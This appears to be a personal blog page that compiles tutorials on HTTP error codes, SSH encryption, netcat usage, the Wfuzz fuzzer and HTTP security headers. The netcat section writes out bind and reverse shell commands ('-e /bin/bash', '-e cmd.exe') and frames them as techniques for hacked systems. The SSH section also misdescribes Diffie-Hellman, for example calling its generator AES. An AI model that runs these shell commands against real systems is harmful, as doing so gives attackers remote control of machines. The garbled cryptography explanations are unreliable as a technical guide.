Mahesh's Blog

" It's hard to beat a person who believes in his or her own strength. And I believe in mine."

Saturday, November 22, 2014

Common HTTP Error Codes

Introduction

When accessing a web server or application, every HTTP request that is received by a server is responded to with an HTTP status code. HTTP status codes are three-digit codes, and are grouped into five different classes. The class of a status code can be quickly identified by its first digit:
  • 1xx: Informational
  • 2xx: Success
  • 3xx: Redirection
  • 4xx: Client Error
  • 5xx: Server Error
This guide focuses on identifying and troubleshooting the most commonly encountered HTTP error codes, i.e. 4xx and 5xx status codes, from a system administrator's perspective. There are many situations that could cause a web server to respond to a request with a particular error code--we will cover common potential causes and solutions.

Client and Server Error Overview

Client errors, or HTTP status codes from 400 to 499, are the result of HTTP requests sent by a user client (i.e. a web browser or other HTTP client). Even though these types of errors are client-related, it is often useful to know which error code a user is encountering to determine if the potential issue can be fixed by server configuration.
Server errors, or HTTP status codes from 500 to 599, are returned by a web server when it is aware that an error has occurred or is otherwise not able to process the request.

General Troubleshooting Tips

  • When using a web browser to test a web server, refresh the browser after making server changes
  • Check server logs for more details about how the server is handling the requests. For example, web servers such as Apache or Nginx produce two files called access.log and error.log that can be scanned for relevant information
  • Keep in mind that HTTP status code definitions are part of a standard that is implemented by the application that is serving requests. This means that the actual status code that is returned depends on how the server software handles a particular error--this guide should generally point you in the right direction
Now that you have a high-level understanding of HTTP status codes, we will look at the commonly encountered errors.

400 Bad Request

The 400 status code, or Bad Request error, means the HTTP request that was sent to the server has invalid syntax.
Here are a few examples of when a 400 Bad Request error might occur:
  • The user's cookie that is associated with the site is corrupt. Clearing the browser's cache and cookies could solve this issue
  • Malformed request due to a faulty browser
  • Malformed request due to human error when manually forming HTTP requests (e.g. using curl incorrectly)

401 Unauthorized

The 401 status code, or an Unauthorized error, means that the user trying to access the resource has not been authenticated or has not been authenticated correctly. This means that the user must provide credentials to be able to view the protected resource.
An example scenario where a 401 Unauthorized error would be returned is if a user tries to access a resource that is protected by HTTP authentication, as in this Nginx tutorial. In this case, the user will receive a 401 response code until they provide a valid username and password (one that exists in the .htpasswd file) to the web server.

403 Forbidden

The 403 status code, or a Forbidden error, means that the user made a valid request but the server is refusing to serve the request, due to a lack of permission to access the requested resource. If you are encountering a 403 error unexpectedly, there are a few typical causes that are explained here.

File Permissions

403 errors commonly occur when the user that is running the web server process does not have sufficient permissions to read the file that is being accessed.
To give an example of troubleshooting a 403 error, assume the following situation:
  • The user is trying to access the web server's index file, from http://example.com/index.html
  • The web server worker process is owned by the www-data user
  • On the server, the index file is located at /usr/share/nginx/html/index.html
If the user is getting a 403 Forbidden error, ensure that the www-data user has sufficient permissions to read the file. Typically, this means that the other permissions of the file should be set to read. There are several ways to ensure this, but the following command will work in this case:
sudo chmod o=r /usr/share/nginx/html/index.html

.htaccess

Another potential cause of 403 errors, often intentinally, is the use of an .htaccess file. The .htaccess file can be used to deny access of certain resources to specific IP addresses or ranges, for example.
If the user is unexpectedly getting a 403 Forbidden error, ensure that it is not being caused by your .htaccess settings.

Index File Does Not Exist

If the user is trying to access a directory that does not have a default index file, and directory listings are not enabled, the web server will return a 403 Forbidden error. For example, if the user is trying to access http://example.com/emptydir/, and there is no index file in the emptydir directory on the server, a 403 status will be returned.
If you want directory listings to be enabled, you may do so in your web server configuration.

404 Not Found

The 404 status code, or a Not Found error, means that the user is able to communicate with the server but it is unable to locate the requested file or resource.
404 errors can occur in a large variety of situations. If the user is unexpectedly receiving a 404 Not Found error, here are some questions to ask while troubleshooting:
  • Does the link that directed the user to your server resource have a typographical error in it?
  • Did the user type in the wrong URL?
  • Does the file exist in the correct location on the server? Was the resource was moved or deleted on the server?
  • Does the server configuration have the correct document root location?
  • Does the user that owns the web server worker process have privileges to traverse to the directory that the requested file is in? (Hint: directories require read and execute permissions to be accessed)
  • Is the resource being accessed a symbolic link? If so, ensure the web server is configured to follow symbolic links

500 Internal Server Error

The 500 status code, or Internal Server Error, means that server cannot process the request for an unknown reason. Sometimes this code will appear when more specific 5xx errors are more appropriate.
This most common cause for this error is server misconfiguration (e.g. a malformed .htaccess file) or missing packages (e.g. trying to execute a PHP file without PHP installed properly).

502 Bad Gateway

The 502 status code, or Bad Gateway error, means that the server is a gateway or proxy server, and it is not receiving a valid response from the backend servers that should actually fulfill the request.
If the server in question is a reverse proxy server, such as a load balancer, here are a few things to check:
  • The backend servers (where the HTTP requests are being forwarded to) are healthy
  • The reverse proxy is configured properly, with the proper backends specified
  • The network connection between the backend servers and reverse proxy server is healthy. If the servers can communicate on other ports, make sure that the firewall is allowing the traffic between them
  • If your web application is configured to listen on a socket, ensure that the socket exists in the correct location and that it has the proper permissions

503 Service Unavailable

The 503 status code, or Service Unavailable error, means that the server is overloaded or under maintenance. This error implies that the service should become available at some point.
If the server is not under maintenance, this can indicate that the server does not have enough CPU or memory resources to handle all of the incoming requests, or that the web server needs to be configured to allow more users, threads, or processes.

504 Gateway Timeout

The 504 status code, or Gateway Timeout error, means that the server is a gateway or proxy server, and it is not receiving a response from the backend servers within the allowed time period.
This typically occurs in the following situations:
  • The network connection between the servers is poor
  • The backend server that is fulfilling the request is too slow, due to poor performance
  • The gateway or proxy server's timeout duration is too short

SSH Encryption and Connection Process

Introduction

SSH, or secure shell, is a secure protocol and the most common way of safely administering remote servers. Using a number of encryption technologies, SSH provides a mechanism for establishing a cryptographically secured connection between two parties, authenticating each side to the other, and passing commands and output back and forth.

In this guide, we will be examining the underlying encryption techniques that SSH employs and the methods it uses to establish secure connections. This information can be useful for understanding the various layers of encryption and the different steps needed to form a connection and authenticate both parties.

Symmetric Encryption, Asymmetric Encryption, and Hashes

In order to secure the transmission of information, SSH employs a number of different types of data manipulation techniques at various points in the transaction. These include forms of symmetrical encryption, asymmetrical encryption, and hashing.

Symmetrical Encryption

The relationship of the components that encrypt and decrypt data determine whether an encryption scheme is symmetrical or asymmetrical.
Symmetrical encryption is a type of encryption where one key can be used to encrypt messages to the opposite party, and also to decrypt the messages received from the other participant. This means that anyone who holds the key can encrypt and decrypt messages to anyone else holding the key.
This type of encryption scheme is often called "shared secret" encryption, or "secret key" encryption. There is typically only a single key that is used for all operations, or a pair of keys where the relationship is easy to discover and it is trivial to derive the opposite key.
Symmetric keys are used by SSH in order to encrypt the entire connection. Contrary to what some users assume, public/private asymmetrical key pairs that can be created are only used for authentication, not the encrypting the connection. The symmetrical encryption allows even password authentication to be protected against snooping.
The client and server both contribute toward establishing this key, and the resulting secret is never known to outside parties. The secret key is created through a process known as a key exchange algorithm. This exchange results in the server and client both arriving at the same key independently by sharing certain pieces of public data and manipulating them with certain secret data. This process is explained in greater detail later on.
The symmetrical encryption key created by this procedure is session-based and constitutes the actual encryption for the data sent between server and client. Once this is established, the rest of the data must be encrypted with this shared secret. This is done prior to authenticating a client.
SSH can be configured to utilize a variety of different symmetrical cipher systems, including AES, Blowfish, 3DES, CAST128, and Arcfour. The server and client can both decide on a list of their supported ciphers, ordered by preference. The first option from the client's list that is available on the server is used as the cipher algorithm in both directions.
On Ubuntu 14.04, both the client and the server are defaulted like this: aes128-ctr, aes192-ctr, aes256-ctr, arcfour256, arcfour128, aes128-gcm@openssh.com, aes256-gcm@openssh.com, chacha20-poly1305@openssh.com, aes128-cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour.
This means that if two Ubuntu 14.04 machines are connecting to each other (without overriding the default ciphers through configuration options), they will always use the aes128-ctr cipher to encrypt their connection.

Asymmetrical Encryption

Asymmetrical encryption is different from symmetrical encryption in that to send data in a single direction, two associated keys are needed. One of these keys is known as the private key, while the other is called the public key.
The public key can be freely shared with any party. It is associated with its paired key, but the private key cannot be derived from the public key. The mathematical relationship between the public key and the private key allows the public key to encrypt messages that can only be decrypted by the private key. This is a one-way ability, meaning that the public key has no ability to decrypt the messages it writes, nor can it decrypt anything the private key may send it.
The private key should be kept entirely secret and should never be shared with another party. This is a key requirement for the public key paradigm to work. The private key is the only component capable of decrypting messages that were encrypted using the associated public key. By virtue of this fact, any entity capable decrypting these messages has demonstrated that they are in control of the private key.
SSH utilizes asymmetric encryption in a few different places. During the initial key exchange process used to set up the symmetrical encryption (used to encrypt the session), asymmetrical encryption is used. In this stage, both parties produce temporary key pairs and exchange the public key in order to produce the shared secret that will be used for symmetrical encryption.
The more well-discussed use of asymmetrical encryption with SSH comes from SSH key-based authentication. SSH key pairs can be used to authenticate a client to a server. The client creates a key pair and then uploads the public key to any remote server it wishes to access. This is placed in a file called authorized_keys within the ~/.ssh directory in the user account's home directory on the remote server.
After the symmetrical encryption is established to secure communications between the server and client, the client must authenticate to be allowed access. The server can use the public key in this file to encrypt a challenge message to the client. If the client can prove that it was able to decrypt this message, it has demonstrated that it owns the associated private key. The server then can set up the environment for the client.

Hashing

Another form of data manipulation that SSH takes advantage of is cryptographic hashing. Cryptographic hash functions are methods of creating a succinct "signature" or summary of a set of information. Their main distinguishing attributes are that they are never meant to be reversed, they are virtually impossible to influence predictably, and they are practically unique.
Using the same hashing function and message should produce the same hash; modifying any portion of the data should produce an entirely different hash. A user should not be able to produce the original message from a given hash, but they should be able to tell if a given message produced a given hash.
Given these properties, hashes are mainly used for data integrity purposes and to verify the authenticity of communication. The main use in SSH is with HMAC, or hash-based message authentication codes. These are used to ensure that the received message text is intact and unmodified.
As part of the symmetrical encryption negotiation outlined above, a message authentication code (MAC) algorithm is selected. The algorithm is chosen by working through the client's list of acceptable MAC choices. The first one out of this list that the server supports will be used.
Each message that is sent after the encryption is negotiated must contain a MAC so that the other party can verify the packet integrity. The MAC is calculated from the symmetrical shared secret, the packet sequence number of the message, and the actual message content.
The MAC itself is sent outside of the symmetrically encrypted area as the final part of the packet. Researchers generally recommend this method of encrypting the data first, and then calculating the MAC.

How Does SSH Work?

You probably already have a basic understanding of how SSH works. The SSH protocol employs a client-server model to authenticate two parties and encrypt the data between them.
The server component listens on a designated port for connections. It is responsible for negotiating the secure connection, authenticating the connecting party, and spawning the correct environment if the credentials are accepted.
The client is responsible for beginning the initial TCP handshake with the server, negotiating the secure connection, verifying that the server's identity matches previously recorded information, and providing credentials to authenticate.
An SSH session is established in two separate stages. The first is to agree upon and establish encryption to protect future communication. The second stage is to authenticate the user and discover whether access to the server should be granted.

Negotiating Encryption for the Session

When a TCP connection is made by a client, the server responds with the protocol versions it supports. If the client can match one of the acceptable protocol versions, the connection continues. The server also provides its public host key, which the client can use to check whether this was the intended host.
At this point, both parties negotiate a session key using a version of something called the Diffie-Hellman algorithm. This algorithm (and its variants) make it possible for each party to combine their own private data with public data from the other system to arrive at an identical secret session key.
The session key will be used to encrypt the entire session. The public and private key pairs used for this part of the procedure are completely separate from the SSH keys used to authenticate a client to the server.
The basis of this procedure for classic Diffie-Hellman is:
  1. Both parties agree on a large prime number, which will serve as a seed value.
  2. Both parties agree on an encryption generator (typically AES), which will be used to manipulate the values in a predefined way.
  3. Independently, each party comes up with another prime number which is kept secret from the other party. This number is used as the private key for this interaction (different than the private SSH key used for authentication).
  4. The generated private key, the encryption generator, and the shared prime number are used to generate a public key that is derived from the private key, but which can be shared with the other party.
  5. Both participants then exchange their generated public keys.
  6. The receiving entity uses their own private key, the other party's public key, and the original shared prime number to compute a shared secret key. Although this is independently computed by each party, using opposite private and public keys, it will result in the same shared secret key.
  7. The shared secret is then used to encrypt all communication that follows.
The shared secret encryption that is used for the rest of the connection is called binary packet protocol. The above process allows each party to equally participate in generating the shared secret, which does not allow one end to control the secret. It also accomplishes the task of generating an identical shared secret without ever having to send that information over insecure channels.
The generated secret is a symmetric key, meaning that the same key used to encrypt a message can be used to decrypt it on the other side. The purpose of this is to wrap all further communication in an encrypted tunnel that cannot be deciphered by outsiders.
After the session encryption is established, the user authentication stage begins.

Authenticating the User's Access to the Server

The next stage involves authenticating the user and deciding access. There are a few different methods that can be used for authentication, based on what the server accepts.
The simplest is probably password authentication, in which the server simply prompts the client for the password of the account they are attempting to login with. The password is sent through the negotiated encryption, so it is secure from outside parties.
Even though the password will be encrypted, this method is not generally recommended due to the limitations on the complexity of the password. Automated scripts can break passwords of normal lengths very easily compared to other authentication methods.
The most popular and recommended alternative is the use of SSH key pairs. SSH key pairs are asymmetric keys, meaning that the two associated keys serve different functions.
The public key is used to encrypt data that can only be decrypted with the private key. The public key can be freely shared, because, although it can encrypt for the private key, there is no method of deriving the private key from the public key.
Authentication using SSH key pairs begins after the symmetric encryption has been established as described in the last section. The procedure happens like this:
  1. The client begins by sending an ID for the key pair it would like to authenticate with to the server.
  2. The server check's the authorized_keys file of the account that the client is attempting to log into for the key ID.
  3. If a public key with matching ID is found in the file, the server generates a random number and uses the public key to encrypt the number.
  4. The server sends the client this encrypted message.
  5. If the client actually has the associated private key, it will be able to decrypt the message using that key, revealing the original number.
  6. The client combines the decrypted number with the shared session key that is being used to encrypt the communication, and calculates the MD5 hash of this value.
  7. The client then sends this MD5 hash back to the server as an answer to the encrypted number message.
  8. The server uses the same shared session key and the original number that it sent to the client to calculate the MD5 value on its own. It compares its own calculation to the one that the client sent back. If these two values match, it proves that the client was in possession of the private key and the client is authenticated.
As you can see, the asymmetry of the keys allows the server to encrypt messages to the client using the public key. The client can then prove that it holds the private key by decrypting the message correctly. The two types of encryption that are used (symmetric shared secret, and asymmetric public-private keys) are each able to leverage their specific strengths in this model.

Netcat : Introduction

Netcat is a terminal application that is similar to the telnet program but has lot more features. Its a “power version” of the traditional telnet program. Apart from basic telnet functionas it can do various other things like creating socket servers to listen for incoming connections on ports, transfer files from the terminal etc. So it is a small tool that is packed with lots of features. Therefore its called the “Swiss-army knife for TCP/IP”.
In the Netcat manual, it is defined as:
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
So basically netcat is a tool to do some bidirectional network communication over the TCP/UDP protocols. More technically speaking, netcat can act as a socket server or client and interact with other programs at the same time sending and receiving data through the network. Such a definition sounds too generic and make it difficult to understand what exactly this tool does and what is it useful for. This can be understood only by using and playing with it.
So the first thing to do would be to setup netcat on your machine. Netcat comes in various flavors. Means it is available from multiple vendors. But most of them have similar functionality. On ubuntu there are 3 packages called netcat-openbsd, netcat-traditional and ncat.
My preferred version is ncat. Ncat has been developed by the nmap team is the best of all netcats available and most importantly its cross platform and works very well on windows.

Ncat – Netcat for the 21st Century

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
Download and install netcat
Windows:
Windows version of netcat can be downloaded from here, simply download and extract the files somewhere suitable.
Or download ncat windows version from ncat
Ubuntu/Linux:
Ubuntu syntaptic package has netcat-openbsd and netcat-traditional packages available. Install both of them. Nmap also comes with a netcat implementation called ncat. Install that too.
Project websites
http://nmap.org/ncat/
Install on Ubuntu
sudo apt-get install netcat-traditional netcat-openbsd nmap
To use netcat-openbsd implementation use “nc” command.
To use netcat-traditional implementation use “nc.traditional” command
To use nmap ncat use the “ncat” command.
In the following tutorial we are going to use all of them in different examples in different ways.

1. Telnet

The very first thing netcat can be used as is a telnet program. Lets see how.
nc -v google.com 80
Now netcat is connected to google.com on port 80 and its time to send some message. Lets try to fetch the index page. For this type “GET index.html HTTP/1.1″ and hit the Enter key twice. Remember twice.
nc -v google.com 80
Connection to google.com 80 port [tcp/http] succeeded!
GET index.html HTTP/1.1
HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 18 Aug 2012 06:03:04 GMT
Server: sffe
Content-Length: 219
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
The output from google.com has been received and echoed on the terminal.

2. Simple socket server

To open a simple socket server type in the following command.
 nc -l -v 1234
The above command means : Netcat listen to TCP port 1234. The -v option gives verbose output for better understanding. Now from another terminal try to connect to port 1234 using telnet command as follows :
telnet localhost 1234
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
abc
ting tong
After connecting we send some test message like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.
nc -l -v 5555
Connection from 127.0.0.1 port 5555 [tcp/rplay] accepted
abc
ting tong
This is a complete Chatting System. Type something in netcat terminal and it will show up in telnet terminal as well. So this technique can be used for chatting between 2 machines.
Complete ECHO Server
Ncat with the -c option can be used to start a echo server. Source
Start the echo server using ncat as follows
 ncat -v -l -p 5555 -c ‘while true; do read i && echo [echo] $i; done’
Now from another terminal connect using telnet and type something. It will be send back with “[echo]” prefixed.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.
Note : Netcat can be told to save the data to a file instead of echoing it to the terminal.
 nc -l -v 1234 > data.txt
UDP ports
Netcat works with udp ports as well. To start a netcat server using udp ports use the -u option
 nc -v -ul 7000
Connect to this server using netcat from another terminal
 nc localhost -u 7000
Now both terminals can chat with each other.

3. File transfer

A whole file can be transferred with netcat. Here is a quick example.
One machine A – Send File
 cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:5555
In the above command, the cat command reads and outputs the content of happy.txt. The output is not echoed to the terminal, instead is piped or fed to ncat which has opened a socket server on port 5555.
On machine B – Receive File
 ncat localhost 5555 > happy_copy.txt
In the above command ncat will connect to localhost on port 5555 and whatever it receives will be written to happy_copy.txt
Now happy_copy.txt will be a copy of happy.txt since the data being send over port 5555 is the content of happy.txt in the previous command.
Netcat will send the file only to the first client that connects to it. After that its over.
And after the first client closes down connection, netcat server will also close down the connection.

4. Port scanning

Netcat can also be used for port scanning. However this is not a proper use of netcat and a more applicable tool like nmap should be used.
 nc -v -n -z -w 1 192.168.1.2 75-85
nc: connect to 192.168.1.2 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 79 (tcp) failed: Connection refused
Connection to 192.168.1.2 80 port [tcp/*] succeeded!
nc: connect to 192.168.1.2 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 85 (tcp) failed: Connection refused
The “-n” parameter here prevents DNS lookup, “-z” makes nc not receive any data from the server, and “-w 1″ makes the connection timeout after 1 second of inactivity.

5. Remote Shell/Backdoor

Ncat can be used to start a basic shell on a remote system on a port without the need of ssh. Here is a quick example.
 ncat -v -l -p 7777 -e /bin/bash
The above will start a server on port 7777 and will pass all incoming input to bash command and the results will be send back. The command basically converts the bash program into a server. So netcat can be used to convert any process into a server.
Connect to this bash shell using nc from another terminal
 nc localhost 7777
Now try executing any command like help , ls , pwd etc.
Windows
On windows machine the cmd.exe (dos prompt program) is used to start a similar shell using netcat. The syntax of the command is same.
C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
listening on [any] 8888 …
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 1182
Now another console can connect using the telnet command.
Although netcat though can be used to setup remote shells, is not useful to get an interactive shell on a remote system because in most cases netcat would not be installed on a remote system.
The most effective method to get a shell on a remote machine using netcat is by creating reverse shells.

6. Reverse Shells

This is the most powerful feature of netcat for which it is most used by hackers. Netcat is used in almost all reverse shell techniques to catch the reverse connection of shell program from a hacked system.
Reverse telnet
First lets take an example of a simple reverse telnet connection. In ordinate telnet connection the client connects to the server to start a communication channel.
Your system runs (# telnet server port_number) =============> Server

Now using the above technique you can connect to say port 80 of the server to fetch a webpage. However a hacker is interested in getting a command shell. Its the command prompt of windows or the terminal of linux. The command shell gives ultimate control of the remote system. Now there is no service running on the remote server to which you can connect and get a command shell.
So when a hacker hacks into a system, he needs to get a command shell. Since its not possible directly, the solution is to use a reverse shell. In a reverse shell the server initiates a connection to the hacker’s machine and gives a command shell.
Step 1 : Hacker machine (waiting for incoming connection)
Step 2 : Server ==============> Hacker machine

To wait for incoming connections, a local socket listener has to be opened. Netcat/ncat can do this.
First a netcat server has to be started on local machine or the hacker’s machine.
machine A
 ncat -v -l -p 8888
Ncat: Version 6.00 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
The above will start a socket server (listener) on port 8888 on local machine/hacker’s machine.
Now a reverse shell has to be launched on the target machine/hacked machine. There are a number of ways to launch reverse shells.
For any method to work, the hacker either needs to be able to execute arbitrary command on the system or should be able to upload a file that can be executed by opening from the browser (like a php script).
In this example we are not doing either of the above mentioned things. We shall just run netcat on the server also to throw a reverse command shell to demonstrate the concept. So netcat should be installed on the server or target machine.
Machine B :
 ncat localhost 8888 -e /bin/bash
This command will connect to machine A on port 8888 and feed in the output of bash effectively giving a shell to machine A. Now machine A can execute any command on machine B.
Machine A
ncat -v -l -p 8888
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 127.0.0.1.
pwd
/home/enlightened
In a real penetration testing scenario its not possible to run netcat on target machine. Therefore other techniques are employed to create a shell. These include uploading reverse shell php scripts and running them by opening them in browser. Or launching a buffer overflow exploit to execute reverse shell payload.

Wfuzz 2.1 released !

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc.), bruteforce GET and POST parameters for checking different kind of injections, bruteforce forms parameters (User/Password), Fuzzing,etc.

The biggest change is that wfuzz now supports plugins, so you can code your scripts and improve or modify the application's functionality. For example, there is a plugin that parses links within the HTTP response and these will be added to the fuzzing queue. Check below how a single word "a" generates 8 different requests:



 $ python wfuzz.py --script=links -z list,a --follow  http://localhost:8000/FUZZ
********************************************************
* Wfuzz 2.1 - The Web Bruteforcer                      *
********************************************************

Target: http://localhost:8000/FUZZ
Total requests: 1

===========================================
ID      Response   Lines      Word         Chars          Request  
===========================================
00000:  C=200     17 L        89 W         1481 Ch        "a"
  |_ Plugin links enqueued 5 more requests (rlevel=1)
00001:  C=200     14 L        57 W          889 Ch        "/a/b/"
  |_ Plugin links enqueued 2 more requests (rlevel=2)
00002:  C=200      4 L        25 W          177 Ch        "/"
00003:  C=200      9 L         7 W           61 Ch        "/a/test.html"
00004:  C=200      4 L         6 W           47 Ch        "/a/test.js"
00005:  C=403     10 L        30 W          285 Ch        "/icons/"
00006:  C=200     17 L        89 W         1481 Ch        "/a/"
00007:  C=200     14 L        57 W          895 Ch        "/a/b/c/"
  |_ Plugin links enqueued 1 more requests (rlevel=3)
00008:  C=200     13 L        46 W          716 Ch        "/a/b/c/d/"

Guidelines for Setting HTTP Security Headers

X-XSS-Protection

Purpose

This response header can be used to configure a user-agent's built in reflective XSS protection. Currently, only Microsoft's Internet Explorer, Google Chrome and Safari (WebKit) support this header.

Valid Settings

  • 0 - Disables the XSS Protections offered by the user-agent.
  • 1 - Enables the XSS Protections
  • 1; mode=block - Enables XSS protections and instructs the user-agent to block the response in the event that script has been inserted from user input, instead of sanitizing.
  • 1; report=http://site.com/report - A Chrome and WebKit only directive that tells the user-agent to report potential XSS attacks to a single URL. Data will be POST'd to the report URL in JSON format.

Common Invalid Settings

  • 0; mode=block; - A common misconfiguration where the 0 value will disable protections even though the mode=block is defined. It should be noted that Chrome has been enhanced to fail closed and treat this as an invalid setting but still keep default XSS protections in place.
  • 1 mode=block; - All directives must be separated by a ;. Spaces and , are invalid separators. However, IE and Chrome will default to sanitizing the XSS in this case but not enable blocking mode as everything after the 1 is considered invalid.

How To Test

Internet Explorer will display a dialog box if reflective XSS was detected and sanitized or blocked. Chrome will hide the output of the reflective XSS attack in the response when it is set to 1. When it is set to 1; mode=block, Chrome will redirect the user-agent to an empty data:, URL.

External References


X-Content-Type-Options

Purpose

This header can be set to protect against MIME type confusion attacks in Internet Explorer 9, Chrome and Safari. Firefox is currently debating the implementation. Content sniffing is a method browsers use to attempt to determine the 'real' content type of a response by looking at the content itself, instead of the response header's content-type value. By returning X-Content-Type-Options: nosniff, certain elements will only load external resources if their content-type matches what is expected. As an example, if a stylesheet is being loaded, the MIME type of the resource must match "text/css". For script resources in Internet Explorer, the following content types are valid:
  1. application/ecmascript
  2. application/javascript
  3. application/x-javascript
  4. text/ecmascript
  5. text/javascript
  6. text/jscript
  7. text/x-javascript
  8. text/vbs
  9. text/vbscript
For Chrome, the following are supported MIME types:
  1. text/javascript
  2. text/ecmascript
  3. application/javascript
  4. application/ecmascript
  5. application/x-javascript
  6. text/javascript1.1
  7. text/javascript1.2
  8. text/javascript1.3
  9. text/jscript
  10. text/livescript

Valid Settings

  • nosniff - This is the only valid setting, it must match nosniff.

Common Invalid Settings

  • 'nosniff' - Quotes are not allowed.
  • : nosniff - Incorrectly adding an additional : is also invalid.

How To Test

Open the developer panel in Internet Explorer or Chrome and observe the difference between: having nosniff and not having nosniff set in the console output.

External References


X-Frame-Options

Purpose

This header is for configuring which sites are allowed to frame the loaded resource. Its primary purpose is to protect against UI redressing style attacks. Internet Explorer has supported the ALLOW-FROM directive since IE8 and Firefox from 18. Both Chrome and Safari do not support ALLOW-FROM, however WebKit is currently discussing it.

Valid Settings

  • DENY - Denies any resource (local or remote) from attempting to frame the resource that also supplied the X-Frame-Options header.
  • SAMEORIGIN - Allows only resources which are apart of the Same Origin Policy to frame the protected resource.
  • ALLOW-FROM http://www.example.com - Allows a single serialized-origin (must have scheme) to frame the protected resource. This is only valid in Internet Explorer and Firefox. The default of other browsers is to allow any origin (as if X-Frame-Options was not set).

Common Invalid Settings

  • ALLOW FROM http://example.com - The ALLOW-FROM directive must use the hyphen character, not a space between allow and from.
  • ALLOW-FROM example.com - The ALLOW-FROM directive must use an URI with a valid scheme (http or https).

How To Test

Visit the test cases and view the various options and how the browser responds to framing the resources.

External References


Strict-Transport-Security

Purpose

The Strict Transport Security (STS) header is for configuring user-agents to only communicate to the server over a secure transport. It is primarily used to protect against man-in-the-middle attacks by forcing all further communications to occur over TLS. Internet Explorer does not currently support the STS header. It should be noted that setting this header on a HTTP response has no effect since values could easily be forged by an active attack. To combat this bootstrapping problem, many browsers contain a preloaded list of sites that are configured for STS.

Valid Settings

The following values must exist over the secure connection (HTTPS) and are ineffective if accessed over HTTP.
  • max-age=31536000 - Tells the user-agent to cache the domain in the STS list for one year.
  • max-age=31536000; includeSubDomains - Tells the user-agent to cache the domain in the STS list for one year and include any sub-domains.
  • max-age=0 - Tells the user-agent to remove, or not cache the host in the STS cache.

Common Invalid Settings

  • Setting the includeSubDomains directive on https://www.example.com where users can still access the site at http://example.com. If example.com does not redirect to https://example.com and set the STS header, only direct requests to http://www.example.com will be automatically redirected to https://www.example.com by the user-agent.
  • max-age=60 - This only sets the domain in the STS cache for 60 seconds. This is not long enough to protect a user who accesses the site, goes to their local coffee shop and attempts to access the site over http first.
  • max-age=31536000 includeSubDomains - Directives must be separated by a ;. In this case Chrome will not add the site to the STS cache even though the max-age value is correct.
  • max-age=31536000, includeSubDomains - Same as above.
  • max-age=0 - While this is technically a valid configuration. Many sites may do this accidentally, thinking a value of 0 means forever.

How To Test

Determining if a host is your STS cache is possible by accessing "chrome://net-internals/#hsts" in Google Chrome. First, check if the domain is in the STS cache by using the Query Domain option. Next, visit the site that returns the STS header over HTTPS and attempt to query it again to determine if it was added successfully.

External References


Public-Key-Pins (Draft Header)

Purpose

This header is still under draft specification but may have clear security impacts so it has been added to this list. The purpose of the Public-Key-Pins (PKP) header is to allow site operators to provide hashed public key information to be stored in the browser's cache. Much like it Strict-Transport-Security header it will help user's from active man-in-the-middle attacks.The header may include multiple pin- directives. For example, pin-sha256=base64(sha256(SPKI)). The base64 encoded sha256 hash is the result of hashing the Subject Public Key Info (SPKI) field of an X.509 certificate. While the specification or implementations may change, it was observed that not encapsulating the hashes in quotes is invalid and the hashes will not be added to the PKP cache in Chrome 33.
This header acts much like STS by including the max-age and includeSubDomains directive. Additionally, PKP supports a Public-Key-Pins-Report-Only header which can be used to report violations but will not enforce the pinning of certificate information, however this does not appear to be implemented in Chrome yet.

Valid Settings

  • max-age=3000; pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM="; - Pins this host for 3000 seconds using the base64 encoded sha256 hash of the x.509 certificate's Subject Public Key Info with hashes properly encapsulated in quotes.
  • max-age=3000; pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM="; report-uri="http://example.com/pkp-report" - Same as above but allows violations to be reported. Note that if this value is sent in the Public-Key-Pins header the user-agent should enforce and report violations. If the value is sent in Public-Key-Pins-Report-Only it will not be enforced but violations will be reported to the defined site.

Common Invalid Settings

  • max-age=3000; pin-sha256=d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM=; - Not encapsulating the hash value in quotes leads to Chrome 33 not adding the keys to the PKP cache. This mistake was observed in all but one of the four sites that returned this or the report-only header response.

How To Test

Using the same method as Strict-Transport-Security additional information under the pubkey_hashes field should be visible, if the site successfully had the PKP hashes added.

External References


Access-Control-Allow-Origin

Purpose

